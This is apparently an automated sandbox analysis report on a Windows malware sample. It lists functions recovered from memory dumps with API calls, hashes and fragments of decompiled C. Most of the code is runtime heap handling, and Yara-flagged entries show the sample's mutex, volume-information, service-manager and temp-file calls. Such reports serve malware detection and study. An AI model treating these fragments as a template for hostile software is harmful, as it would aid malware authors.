                                                                              0x0041476c
                                                                              0x00414772
                                                                              0x00000000
                                                                              0x00414772
                                                                              0x0041471b
                                                                              0x0041471e
                                                                              0x00414721
                                                                              0x00414724
                                                                              0x0041472a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041472e
                                                                              0x00414734
                                                                              0x00414737
                                                                              0x0041473e
                                                                              0x00414741
                                                                              0x00414745
                                                                              0x0041474a
                                                                              0x0041474f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00414757
                                                                              0x0041475c
                                                                              0x00000000
                                                                              0x00414780
                                                                              0x00414787
                                                                              0x00000000

                                                                              APIs
                                                                              • __lock.LIBCMT ref: 0041472E
                                                                              • RtlAllocateHeap.NTDLL(00000008,?,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 0041476C
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap__lock
                                                                              • String ID:
                                                                              • API String ID: 4078605025-0
                                                                              • Opcode ID: 9e3f344b9606a3d4450a4edb9d16289ef02f26369923d962b6e20b81e9ae5539
                                                                              • Instruction ID: 9a9508c772f301707be30ab66f077d5bbe1b64f7d936fa0f595aadbb1db11760
                                                                              • Opcode Fuzzy Hash: 9e3f344b9606a3d4450a4edb9d16289ef02f26369923d962b6e20b81e9ae5539
                                                                              • Instruction Fuzzy Hash: 2D119336C0171896CB21AB659D417DE7730EBD2735F25411BE8346B3D1DB3C49818A9D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222DFD2, Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 02221000: GetFileAttributesW.KERNELBASE(?), ref: 02221047
                                                                                • Part of subcall function 02221000: CreateDirectoryW.KERNEL32(?,00000000), ref: 0222105A
                                                                                • Part of subcall function 02221000: GetLastError.KERNEL32 ref: 02221064
                                                                                • Part of subcall function 0222108B: memset.NTDLL ref: 022210A0
                                                                                • Part of subcall function 0222108B: SHFileOperationW.SHELL32(?), ref: 022210C2
                                                                              • GetTempPathW.KERNEL32(00000104,?,?,02233F20), ref: 0222E014
                                                                              • GetTempFileNameW.KERNEL32(?,00000000,00000000,?,?,02233F20), ref: 0222E024
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$Temp$AttributesCreateDirectoryErrorLastNameOperationPathmemset
                                                                              • String ID:
                                                                              • API String ID: 130228747-0
                                                                              • Opcode ID: 5fb2bf112d8861d0e8e219c272909b772db2566cd98d68c3ca311c93928ec697
                                                                              • Instruction ID: 1db15c03d8bc441848a2a5b68770035d7742e4b3f09a197388a26eb40b0814a8
                                                                              • Opcode Fuzzy Hash: 5fb2bf112d8861d0e8e219c272909b772db2566cd98d68c3ca311c93928ec697
                                                                              • Instruction Fuzzy Hash: B701D861B1033967C72076E45894DAB723E9B40350F4105A59D4DE720EDE22DE5F4AD0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222108B, Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileOperationmemset
                                                                              • String ID:
                                                                              • API String ID: 1721435463-0
                                                                              • Opcode ID: 762847670313ced1e8aa82065d00876773c677a8a616d89b19d604fe8872bcf9
                                                                              • Instruction ID: af495a49409e6434a50b0b1b8a64c6ab7ff52b0c5c4b1bfb870c51b7c6447d17
                                                                              • Opcode Fuzzy Hash: 762847670313ced1e8aa82065d00876773c677a8a616d89b19d604fe8872bcf9
                                                                              • Instruction Fuzzy Hash: 02F03071E0025D9FDB109EEA9C85AAFB7BCEB44314F10053AE904E2240E6718E188BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00412A4D, Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 18%
                                                                              			E00412A4D() {
				char _t9;
				intOrPtr _t12;
				void* _t14;
				void* _t19;
				void* _t20;
				intOrPtr _t21;
				void* _t22;

				_push(0xc);
				_push(0x44bc58);
				_t9 = E00412BA4(_t14, _t19, _t20);
				_t21 =  *((intOrPtr*)(_t22 + 8));
				if(_t21 != 0) {
					if( *0x45bc48 != 3) {
						_push(_t21);
						goto L7;
					} else {
						E004148F8(_t14, _t19, 4);
						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
						_t12 = E004149DC(_t21);
						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
						if(_t12 != 0) {
							_push(_t21);
							_push(_t12);
							E00414A07();
						}
						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
						_t9 = E00412AA0();
						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t22 + 8)));
							L7:
							_push(0);
							_t9 = RtlFreeHeap( *0x45bc44); // executed
						}
					}
				}
				return E00412BDF(_t9);
			}










                                                                              0x00412a4d
                                                                              0x00412a4f
                                                                              0x00412a54
                                                                              0x00412a59
                                                                              0x00412a5e
                                                                              0x00412a67
                                                                              0x00412aa9
                                                                              0x00000000
                                                                              0x00412a69
                                                                              0x00412a6b
                                                                              0x00412a71
                                                                              0x00412a76
                                                                              0x00412a7c
                                                                              0x00412a81
                                                                              0x00412a83
                                                                              0x00412a84
                                                                              0x00412a85
                                                                              0x00412a8b
                                                                              0x00412a8c
                                                                              0x00412a90
                                                                              0x00412a99
                                                                              0x00412a9b
                                                                              0x00412aaa
                                                                              0x00412aaa
                                                                              0x00412ab2
                                                                              0x00412ab2
                                                                              0x00412a99
                                                                              0x00412a67
                                                                              0x00412abd

                                                                              APIs
                                                                              • __lock.LIBCMT ref: 00412A6B
                                                                                • Part of subcall function 004148F8: EnterCriticalSection.KERNEL32(?,?,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 00414920
                                                                              • RtlFreeHeap.NTDLL(00000000,?,0044BC58,0000000C,004148DC,00000000,0044BD10,00000008,00414911,?,?,?,00414733,00000004,0044BD00,00000010), ref: 00412AB2
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEnterFreeHeapSection__lock
                                                                              • String ID:
                                                                              • API String ID: 3012239193-0
                                                                              • Opcode ID: 7de0a700edc51f0575296d7f5c35098e526ef385e058385119acf4dae721a10e
                                                                              • Instruction ID: 935e11fe4407fd2a72af7364bf15c9ba698cc687047e6f296167308fe2797e93
                                                                              • Opcode Fuzzy Hash: 7de0a700edc51f0575296d7f5c35098e526ef385e058385119acf4dae721a10e
                                                                              • Instruction Fuzzy Hash: 1BF06D31945256AEDF34AB659E06BDF3B609F003AAF20011FF014A61D1CFBC99E08A9C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222B901, Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0222B916
                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,022326EC,00000000,00000000,00000000,00000000), ref: 0222B959
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DirectoryInformationVolumeWindows
                                                                              • String ID:
                                                                              • API String ID: 3487004747-0
                                                                              • Opcode ID: cc1e15bbac3d2abeba8ae9578a2a3a5063512eed6182bf403a7f50f314943e40
                                                                              • Instruction ID: 0038545f5e3b6f5eb3990a3742aa4f74e2ae4ccab48e7a42773d9fa58731e027
                                                                              • Opcode Fuzzy Hash: cc1e15bbac3d2abeba8ae9578a2a3a5063512eed6182bf403a7f50f314943e40
                                                                              • Instruction Fuzzy Hash: 96F054A5914328AADF709AA09C0DFB777BCEB80704F04C199E545A3055EBB19DD48E61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004121A0, Relevance: 3.0, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 63%
                                                                              			E004121A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t21;
				void* _t24;

				_push(0xc);
				_push(0x44bbf0);
				E00412BA4(__ebx, __edi, __esi);
				_t19 =  *(_t21 + 8);
				if( *0x45bc48 != 3) {
					L3:
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					if( *0x45bc48 != 1) {
						_t19 = _t19 + 0x0000000f & 0xfffffff0;
					}
					_t9 = RtlAllocateHeap( *0x45bc44, 0, _t19); // executed
				} else {
					_t24 = _t19 -  *0x45bc34; // 0x0
					if(_t24 > 0) {
						goto L3;
					} else {
						E004148F8(__ebx, __edi, 4);
						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
						_push(_t19);
						 *(_t21 - 0x1c) = E004151BB();
						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
						E00412212();
						_t9 =  *(_t21 - 0x1c);
						if( *(_t21 - 0x1c) == 0) {
							goto L3;
						}
					}
				}
				return E00412BDF(_t9);
			}






                                                                              0x004121a0
                                                                              0x004121a2
                                                                              0x004121a7
                                                                              0x004121ac
                                                                              0x004121b6
                                                                              0x004121e6
                                                                              0x004121e8
                                                                              0x004121ea
                                                                              0x004121ea
                                                                              0x004121f2
                                                                              0x004121f7
                                                                              0x004121f7
                                                                              0x00412203
                                                                              0x004121b8
                                                                              0x004121b8
                                                                              0x004121be
                                                                              0x00000000
                                                                              0x004121c0
                                                                              0x004121c2
                                                                              0x004121c8
                                                                              0x004121cc
                                                                              0x004121d3
                                                                              0x004121d6
                                                                              0x004121da
                                                                              0x004121df
                                                                              0x004121e4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004121e4
                                                                              0x004121be
                                                                              0x0041220e

                                                                              APIs
                                                                              • __lock.LIBCMT ref: 004121C2
                                                                                • Part of subcall function 004148F8: EnterCriticalSection.KERNEL32(?,?,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 00414920
                                                                              • RtlAllocateHeap.NTDLL(00000000,?,0044BBF0,0000000C,0041222B,000000E0,00412256,?,0041487B,00000018,0044BD10,00000008,00414911,?,?), ref: 00412203
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCriticalEnterHeapSection__lock
                                                                              • String ID:
                                                                              • API String ID: 409319249-0
                                                                              • Opcode ID: a55cb6f1d43d24d148deef977f9e6cdd6e96af135a18d45a2e99e45d15723aea
                                                                              • Instruction ID: 48c3ffb159e8fc771b64ac231a54c8a91645d08bb152c579a7affd53d3d8778f
                                                                              • Opcode Fuzzy Hash: a55cb6f1d43d24d148deef977f9e6cdd6e96af135a18d45a2e99e45d15723aea
                                                                              • Instruction Fuzzy Hash: 4CF0C831D41214A7DB36EF759E057DE7720FB00725F50012AE924A62E1CFBC5ED0869C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222B963, Relevance: 3.0, APIs: 2, Instructions: 31synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _snwprintf.NTDLL ref: 0222B98B
                                                                              • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0222B9A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateMutex_snwprintf
                                                                              • String ID:
                                                                              • API String ID: 451050361-0
                                                                              • Opcode ID: 9b6c39662d563dd2fb2272ead381c08f77d953a3a2a7769e2885d76bd904d823
                                                                              • Instruction ID: da39269556e8da96403afb75085259cf7e32a88398866c22182d911bb5ec90ba
                                                                              • Opcode Fuzzy Hash: 9b6c39662d563dd2fb2272ead381c08f77d953a3a2a7769e2885d76bd904d823
                                                                              • Instruction Fuzzy Hash: 8CF0EC71E44214A7D710A6E87C49BAA36ACBB04704F400629FE49D6280EE619D348BD5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222B9BC, Relevance: 3.0, APIs: 2, Instructions: 31synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _snwprintf.NTDLL ref: 0222B9E4
                                                                              • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0222B9FC
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateMutex_snwprintf
                                                                              • String ID:
                                                                              • API String ID: 451050361-0
                                                                              • Opcode ID: c9ff578916257b5eacf12d61307a2728970433b24f5ed28fd9760b1f746a00fc
                                                                              • Instruction ID: 67b83ac1dcf06cc279e92a36021ba99d2602ddcf6a1c598ffe1e568e56fbe763
                                                                              • Opcode Fuzzy Hash: c9ff578916257b5eacf12d61307a2728970433b24f5ed28fd9760b1f746a00fc
                                                                              • Instruction Fuzzy Hash: B9F0EC71E4421467D71066E87C09FAA366CBB04704F004519FE09D6280EE219D3487D5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00414943, Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00414943(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x45bc44 = _t6;
				if(_t6 == 0) {
					L4:
					return 0;
				} else {
					_t8 = E00414929();
					 *0x45bc48 = _t8;
					if(_t8 != 3 || E00414994(0x3f8) != 0) {
						return 1;
					} else {
						HeapDestroy( *0x45bc44);
						goto L4;
					}
				}
			}





                                                                              0x00414954
                                                                              0x0041495c
                                                                              0x00414961
                                                                              0x0041498d
                                                                              0x0041498f
                                                                              0x00414963
                                                                              0x00414963
                                                                              0x0041496b
                                                                              0x00414970
                                                                              0x00414993
                                                                              0x00414981
                                                                              0x00414987
                                                                              0x00000000
                                                                              0x00414987
                                                                              0x00414970

                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00412E2C,00000001,?,0044BC68,00000060), ref: 00414954
                                                                                • Part of subcall function 00414994: HeapAlloc.KERNEL32(00000000,00000140,0041497C,000003F8,?,0044BC68,00000060), ref: 004149A1
                                                                              • HeapDestroy.KERNEL32(?,0044BC68,00000060), ref: 00414987
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocCreateDestroy
                                                                              • String ID:
                                                                              • API String ID: 2236781399-0
                                                                              • Opcode ID: aff9073249fdba3df2b0b2e6245fbdc016461b9e352443f97512692afa76d33e
                                                                              • Instruction ID: ef8a14752b0d236ab7371013dea1d91e840b001d055d94ac65187d4ae68ae6b5
                                                                              • Opcode Fuzzy Hash: aff9073249fdba3df2b0b2e6245fbdc016461b9e352443f97512692afa76d33e
                                                                              • Instruction Fuzzy Hash: 3DE04FF0A653019AEB29ABB0AE0576736E8DB84747F10183EF504C51A5FF78C5C0D60C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 022210DC, Relevance: 3.0, APIs: 2, Instructions: 24fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteFile_snwprintf
                                                                              • String ID:
                                                                              • API String ID: 366827715-0
                                                                              • Opcode ID: cddafedd6c8bed2f7f8956ce53870328e04a7210e226c69b357e9c8659d86964
                                                                              • Instruction ID: 44d1271110891861c4cccb14c552a40b82bdf1f32b15291c95d62cf4f30a7d65
                                                                              • Opcode Fuzzy Hash: cddafedd6c8bed2f7f8956ce53870328e04a7210e226c69b357e9c8659d86964
                                                                              • Instruction Fuzzy Hash: E9E0DF71910328B3D720AAE46C0DDDB366DAB04310F4002D1E95DD7146EE745A658BD5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00423E66, Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00423E66() {
				void* _t3;
				void* _t4;
				struct HHOOK__* _t6;

				_t3 = E0042D179();
				if( *((char*)(_t3 + 0x14)) == 0) {
					_t4 = E0042D169();
					_t6 = SetWindowsHookExA(0xffffffff, E00423CE8, 0, GetCurrentThreadId()); // executed
					 *(_t4 + 0x2c) = _t6;
					return _t6;
				}
				return _t3;
			}






                                                                              0x00423e66
                                                                              0x00423e6f
                                                                              0x00423e72
                                                                              0x00423e89
                                                                              0x00423e8f
                                                                              0x00000000
                                                                              0x00423e92
                                                                              0x00423e93

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentHookThreadWindows
                                                                              • String ID:
                                                                              • API String ID: 1904029216-0
                                                                              • Opcode ID: cae5ce49b91b67683fe70485a877443856f942641f6482959c04ee0e154a77bf
                                                                              • Instruction ID: f6c6e9868a24ddcf20022a80b6482d79bb8311178825cfd61d607d367921f13a
                                                                              • Opcode Fuzzy Hash: cae5ce49b91b67683fe70485a877443856f942641f6482959c04ee0e154a77bf
                                                                              • Instruction Fuzzy Hash: 27D0A771A043307FE7102B757D0DB1B3B609B04735F51139BF011525E5C66C8940475D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222DB03, Relevance: 3.0, APIs: 2, Instructions: 10serviceCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenSCManagerW.SECHOST(00000000,00000000,000F003F,0222E2D5,00000102,0222BC8F,?,0222BD08), ref: 0222DB0C
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0222BD08), ref: 0222DB21
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandleManagerOpenService
                                                                              • String ID:
                                                                              • API String ID: 1199824460-0
                                                                              • Opcode ID: f66a6a5c8cf3f3d305142571db927edd2453cedaebab046ae2d5bdd5a8ad885f
                                                                              • Instruction ID: 245a715caae6745dd29a2df381a174a69731b7500b50e85604650ec5f05ef8fe
                                                                              • Opcode Fuzzy Hash: f66a6a5c8cf3f3d305142571db927edd2453cedaebab046ae2d5bdd5a8ad885f
                                                                              • Instruction Fuzzy Hash: F2C04C71BD02016EEF549FE1BC0DB6536A8A704B46F104854A249D55C5CBE1C124CE65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042147B, Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E0042147B(void* __ebx, signed int __ecx, void* __edi, void* __esi) {
				intOrPtr _t46;
				signed int _t48;
				intOrPtr _t53;
				signed int _t58;
				void* _t60;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				intOrPtr* _t68;
				signed int* _t69;
				signed int _t71;
				signed int _t78;
				intOrPtr _t93;
				signed int _t101;
				signed int _t103;
				signed int* _t104;
				void* _t105;
				void* _t107;
				void* _t108;

				E004128A0(E0043162E, _t105);
				_t108 = _t107 - 0x2c;
				_t46 =  *0x457184; // 0xc72e1596
				_push(__ebx);
				_t71 =  *(_t105 + 8);
				_push(__esi);
				 *((intOrPtr*)(_t105 - 0x10)) = _t46;
				_t101 = __ecx;
				if(_t71 != 0xffffffff) {
					_t78 =  *( *(__ecx + 0x24));
					_push(__edi);
					__eflags = _t78;
					if(_t78 == 0) {
						L5:
						_t48 =  *(_t101 + 0x58);
						__eflags = _t48;
						if(_t48 == 0) {
							L30:
							_t49 = _t48 | 0xffffffff;
							__eflags = _t48 | 0xffffffff;
							L31:
							L32:
							 *[fs:0x0] =  *((intOrPtr*)(_t105 - 0xc));
							return E00412FBB(_t49,  *((intOrPtr*)(_t105 - 0x10)));
						}
						__eflags =  *(_t101 + 0x3c);
						if(__eflags != 0) {
							 *(_t105 - 0x2d) = _t71;
							E00401A7A(_t71,  *((intOrPtr*)(_t101 + 0x48)), 0, 0xffffffff);
							_push(0);
							E00421363(_t105 - 0x2c, _t105, 8);
							 *((intOrPtr*)(_t105 - 4)) = 0;
							while(1) {
								__eflags =  *((intOrPtr*)(_t105 - 0x14)) - 0x10;
								_t53 =  *((intOrPtr*)(_t105 - 0x28));
								if( *((intOrPtr*)(_t105 - 0x14)) >= 0x10) {
									_t93 =  *((intOrPtr*)(_t105 - 0x28));
								} else {
									_t53 = _t105 - 0x28;
									_t93 = _t53;
								}
								_t98 =  *( *(_t101 + 0x3c));
								_t58 =  *((intOrPtr*)( *( *(_t101 + 0x3c)) + 0x14))(_t101 + 0x50, _t105 - 0x2d, _t105 - 0x2c, _t105 - 0x38, _t93,  *((intOrPtr*)(_t105 - 0x18)) + _t53, _t105 - 0x34);
								__eflags = _t58;
								if(_t58 < 0) {
									break;
								}
								__eflags = _t58 - 1;
								if(_t58 > 1) {
									__eflags = _t58 - 3;
									if(__eflags != 0) {
										break;
									}
									_push( *(_t101 + 0x58));
									_push( *(_t105 - 0x2d));
									_t60 = E004228AF(0, _t93, _t98, _t101, __eflags);
									_t103 = _t101 | 0xffffffff;
									__eflags = _t60 - _t103;
									if(_t60 == _t103) {
										L28:
										E004019D5(_t105 - 0x2c, _t98, 1, 0);
										_t49 = _t103;
										goto L31;
									}
									L26:
									_t103 =  *(_t105 + 8);
									goto L28;
								}
								__eflags =  *((intOrPtr*)(_t105 - 0x14)) - 0x10;
								_t62 =  *((intOrPtr*)(_t105 - 0x28));
								if( *((intOrPtr*)(_t105 - 0x14)) < 0x10) {
									_t62 = _t105 - 0x28;
								}
								_t98 =  *((intOrPtr*)(_t105 - 0x34)) - _t62;
								__eflags = _t98;
								if(_t98 == 0) {
									L20:
									_t63 = _t105 - 0x2d;
									__eflags =  *((intOrPtr*)(_t105 - 0x38)) - _t105 - 0x2d;
									 *((char*)(_t101 + 0x4c)) = 1;
									if( *((intOrPtr*)(_t105 - 0x38)) != _t105 - 0x2d) {
										goto L26;
									}
									__eflags = _t98;
									if(_t98 == 0) {
										E00421152(_t63, _t105 - 0x2c, _t105, 8, 0);
									}
									continue;
								} else {
									__eflags =  *((intOrPtr*)(_t105 - 0x14)) - 0x10;
									_t65 =  *((intOrPtr*)(_t105 - 0x28));
									if(__eflags < 0) {
										_t65 = _t105 - 0x28;
									}
									_push( *(_t101 + 0x58));
									_push(_t98);
									_push(1);
									_push(_t65);
									_t66 = E00422863(0, _t93, _t98, _t101, __eflags);
									_t108 = _t108 + 0x10;
									__eflags = _t98 - _t66;
									if(_t98 != _t66) {
										_t103 = _t101 | 0xffffffff;
										__eflags = _t103;
										goto L28;
									} else {
										goto L20;
									}
								}
							}
							_t48 = E004019D5(_t105 - 0x2c, _t98, 1, 0);
							goto L30;
						}
						_push(_t48);
						_push(_t71); // executed
						_t48 = E004228AF(_t71, _t92, 0, _t101, __eflags); // executed
						__eflags = _t48 - 0xffffffff;
						if(_t48 == 0xffffffff) {
							goto L30;
						}
						L8:
						_t49 = _t71;
						goto L31;
					}
					_t68 =  *((intOrPtr*)(__ecx + 0x34));
					_t92 =  *_t68 + _t78;
					__eflags = _t78 -  *_t68 + _t78;
					if(_t78 >=  *_t68 + _t78) {
						goto L5;
					}
					 *_t68 =  *_t68 - 1;
					_t104 =  *(__ecx + 0x24);
					_t69 =  *_t104;
					 *_t104 =  &(_t69[0]);
					 *_t69 = _t71;
					goto L8;
				}
				_t49 = 0;
				goto L32;
			}






















                                                                              0x00421480
                                                                              0x00421485
                                                                              0x00421488
                                                                              0x0042148d
                                                                              0x0042148e
                                                                              0x00421494
                                                                              0x00421495
                                                                              0x00421498
                                                                              0x0042149a
                                                                              0x004214a6
                                                                              0x004214a8
                                                                              0x004214ab
                                                                              0x004214ad
                                                                              0x004214ca
                                                                              0x004214ca
                                                                              0x004214cd
                                                                              0x004214cf
                                                                              0x004215f1
                                                                              0x004215f1
                                                                              0x004215f1
                                                                              0x004215f4
                                                                              0x004215f5
                                                                              0x004215f9
                                                                              0x0042160a
                                                                              0x0042160a
                                                                              0x004214d5
                                                                              0x004214d8
                                                                              0x004214fc
                                                                              0x004214ff
                                                                              0x00421504
                                                                              0x0042150a
                                                                              0x0042150f
                                                                              0x00421512
                                                                              0x00421512
                                                                              0x00421516
                                                                              0x00421519
                                                                              0x004215ac
                                                                              0x0042151f
                                                                              0x0042151f
                                                                              0x00421522
                                                                              0x00421522
                                                                              0x00421527
                                                                              0x00421544
                                                                              0x00421549
                                                                              0x0042154b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00421551
                                                                              0x00421554
